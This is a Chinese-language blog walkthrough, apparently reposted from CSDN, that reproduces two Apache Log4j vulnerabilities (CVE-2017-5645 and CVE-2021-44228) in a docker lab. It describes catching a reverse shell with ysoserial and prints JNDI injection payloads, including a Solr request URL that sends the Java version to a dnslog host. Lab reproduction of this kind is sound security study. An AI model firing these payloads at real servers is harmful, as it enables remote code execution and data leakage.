Apache log4j漏洞总结

目录

log4j简介

工具链接

漏洞复现

CVE-2017-5645(Log4j反序列化漏洞)

环境搭建

漏洞原理

影响版本

漏洞复现

CVE-2021-44228(Log4j 2远程代码执行漏洞)

环境搭建

漏洞原理

影响版本

漏洞复现


log4j简介

Apache Log4j 是一个用于Java的日志记录库,其支持启动远程日志服务器。

工具链接

漏洞复现

CVE-2017-5645(Log4j反序列化漏洞)

环境搭建

  • 攻击机IP            121.36.20.179
  • 服务器IP            171.20.10.5

漏洞原理

Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞,攻击者可利用该漏洞执行任意代码。

影响版本

 Log4j < 2.8.2

漏洞复现

1.切换到CVE-07-5645目录下,然后运行`docker-compose up -d`,命令,然后运行`docker-compose ps`命令可以看到4712端口打开,环境搭建成功 。

2.利用在线网站生成经过base64加密过的shell命令

3.然后利用ysoserial工具,将流量发送给服务器4712端口。 

4.侦听我们攻击机的4445端口,等待反弹shell,可以看到成功反弹shell

CVE-2021-44228(Log4j 2远程代码执行漏洞)

环境搭建

  • 服务器IP 121.36.20.179

漏洞原理

在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志的情况下,通过传入类似${jndi:ldap://xxx.dns.com/com mond}的lookup用于进行JNDI注入,执行任意代码。

影响版本

  • 2.0<=log4j 2<=2.14.1

漏洞复现

1.切换到CVE-2021-44228目录,然后运行`docker-compose up -d`,命令,然后访问服务器8983端口,可以看到环境搭建成功 

 2.然后访问指定路径`http://121.36.20.179:8983/solr/admin/cores?action=${jndi:ldap://${sys :java.version}.ekbkqh.dnsl og.cn}`注:标红地方为dnslog当中生成的子域名,当域名有解析记录时,则存在此漏洞。

猜你喜欢

转载自blog.csdn.net/smli_ng/article/details/126114488